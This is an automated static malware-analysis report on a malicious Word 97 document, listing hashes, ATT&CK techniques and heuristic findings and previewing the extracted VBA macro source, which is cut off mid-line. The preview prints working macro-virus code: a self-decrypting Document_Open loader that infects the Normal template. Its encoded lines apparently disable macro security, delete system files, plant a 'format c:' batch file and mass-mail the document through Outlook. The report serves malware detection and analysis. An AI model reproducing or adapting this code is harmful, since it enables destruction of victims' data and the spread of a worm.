Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 847ea305bf32df47…

MALICIOUS

Office (OLE)

43.0 KB Created: 1997-01-30 14:51:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: beed636d44d6dd419f66fcee66105c57 SHA-1: 2801c053dd85913974ac01153efb0b0068e4ad08 SHA-256: 847ea305bf32df47d68ded491f0d61e8cf67c1e49cd70d9f78f4548815767fb1
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to deobfuscate and modify its own code, indicating a downloader or dropper functionality. The presence of the Document_Open macro and the execution of VBA code strongly suggest a spearphishing attachment attack vector.

Heuristics 3

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35269 bytes
SHA-256: c6ad1ef7b475fe409d8748ac4e88b3cb10f545afe9311757a427943dbd99e9f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    Dim M(2) As Variant: Dim L(8) As Byte
    Set M(1) = ActiveDocument.VBProject.VBComponents.Item(1)
    Set M(2) = NormalTemplate.VBProject.VBComponents.Item(1)
    Set CM = M(1).CodeModule
    LinBeg = 33
    Line1 = CM.Lines(LinBeg, 1)
    L(1) = 1: n = 1 + LinBeg: CC = CM.Lines(LinBeg, CM.CountOfLines - LinBeg)
    For I = 2 To 8
        L(I) = Mid(Line1, I, 1)
    Next
    Do While InStr(CM.Lines(n, 1), ": End" + " Sub") = False
        CypLinen = CM.Lines(n, 1)
        Linen = ""
        For k = 2 To Len(CypLinen)
            o = Asc(Mid(CypLinen, k, 1))
            j = Int(o / 32) + 1
            I = 1
            Do While (j <> L(I))
                I = I + 1
            Loop
            nc = o - 32 * (L(I) - I)
            Linen = Linen + Chr(nc)
        Next
        CM.ReplaceLine n, Linen: n = n + 1
    Loop
    CM.DeleteLines LinBeg
    IDHMO (M)
    CM.DeleteLines LinBeg, CM.CountOfLines - LinBeg: CM.InsertLines LinBeg, CC:    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub IDHMO(M As Variant)
'6283457
'    /î %òòïò 2åóõíå .åøô
'    )æ 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ¼¾ ¢¢ 4èåî 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ½ ±
'    #ïííáîä"áòó¨¢4ïïì󢩮#ïîôòïìó¨¢-áãò®%îáâìåä ½ &áìó庠/ðôéïîó®#ïîæéòí#ïîöåòóéïîó ½ &áìó庠/ðôéïîó®6éòõó0òïôåãôéïî ½ &áìó庠/ðôéïîó®3áöå.ïòíáì0òïíðô ½ &áìóå
'    3åô æó ½ #òåáôå/âêåãô¨¢3ãòéðôéîç®&éìå3ùóôåí/âêåãô¢©
'    3åô & ½ æó®'åô&éìå¨.ïòíáì4åíðìáôå®&õìì.áí婺 &®!ôôòéâõôåó ½ °
')æ $áôå ¾ £·¯±·¯°°£ 4èåî   §éô ó íù âéòôèäáù ¡
'    )æ !ððìéãáôéïî®5óåò.áíå ¼¾ ¢þþþ!îçå좠4èåî
'        æó®$åìåôå&éìå ¢#º<éï®óù󢬠4òõ庠æó®$åìåôå&éìå ¢#º<ãïîæéç®óù󢬠4òõ庠æó®$åìåôå&éìå ¢#º<!õôïåøåã®âáô¢¬ 4òõ庠æó®$åìåôå&éìå ¢#º<7éîäï÷ó<÷éî®ãïí¢¬ 4òõåº
'        )æ )î3ôò¨!ððìéãáôéïî®5óåò.áí嬠¢ë袩 ½ 4òõå 4èåî
'            3åô áõ ½ æó®#òåáôå4åøô&éì娢#º<áõôïåøåã®âáô¢¬ 4òõå©
'            áõ®7òéôå,éîå ¨¢ åãèï ïææ¢©
'            áõ®7òéôå,éîå ¨¢ åãèï 9ïõò #ïíðõôåò éó âåéîç ãèåãëåä âù ùïõò !îôé6éòõó ­ 0ìåáóå 7áéô ­¢©
'            áõ®7òéôå,éîå ¨¢ åãèï þþþ!îçå좩
'            áõ®7òéôå,éîå ¨¢æïòíáô ãº ¯áõôïôåóô ¯ñ ¯õ¢©
'            áõ®#ìïóå
'        %îä )æ
'    %îä )æ
'    )æ !ãôéöå$ïãõíåîô®6"0òïêåãô®6"#ïíðïîåîôó®)ôåí¨±©®.áíå ½ ¢4èéó$ï㢠4èåî
'        3åô /, ½ #òåáôå/âêåãô¨¢/õôìïïë®!ððìéãáôéï
'        3åô -. ½ /,®'åô.áíå3ðáã娢-!0)¢©º -.®,ïçï3åô /- ½ /,®#òåáôå)ôåí¨ïì-áéì)ôåí©
'        &ïò á ½ ± 4ï -.®!ääòåóó,éóôó®#ïõîô
'            2áîäïíéúå 4éíåò
'            )æ -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¾ ¸ 4èåî
'                &ïò ò ½ ± 4ï )îô¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¯ ¸©
'                    4áòçåô ½ )îô¨± « -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ª 2îä©
'                    /-®2åãéðéåîôó®!ää ¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó¨4áòçåô©©
'                .åøô
'            %îä )æ
'        .åøô
'        7éôè /-
'            3åô 2åã ½ ®2åãéðéåîôó®!ä䨢ïõôìïïë¹·?²°°° èïôíáéì®ãïí¾¢©º 2åã®2åóïìöå
'            ®3õâêåãô ½ !ãôéöå$ïãõíåîô®.áí庠®"ïäù ½ !ððìéãáôéïî®5óåò.áíå ¦ öâ#ò,æ ¦ !ððìéãáôéïî®5óåò!ääòåóó ¦ öâ#ò,æ ¦ öâ#ò,溠®!ôôáãèíåîôó®!ää !ãôéöå$ïãõíåîô®&õìì.áí庠®3åîä
'        %îä 7éôè
'        -.®,ïçïææ
'        3åô /, ½ .ïôèéîç
'    %îä )æ
'%îä )æ
'    .â,± ½ -¨±©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
'    .â,² ½ -¨²©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
'    ).&? ½ &áìó庠,éî"åç ½ ³³
'    )æ -¨²©®.áíå ¼¾ ¢4èéó$ï㢠4èåî
'        )æ .â,² ¾ ° 4èåî
'            -¨²©®#ïäå-ïäõìå®$åìåôå,éîå󠱬 .â,²
'        %îä )æ
'        -¨²©®.áíå ½ ¢4èéó$ï㢺 ).& ½ 4òõå
'    %îä )æ
'    )æ ).& ½ &áìóå 4èåî 'ï4ï #2904?
'    .å÷.áíå ½ ¢¢
'    2áîäïíéúå 4éíåò
'    &ïò ) ½ ± 4ï µ
'        .å÷.áíå ½ .å÷.áíå « #èò¨)îô¨¶µ « 
... (truncated)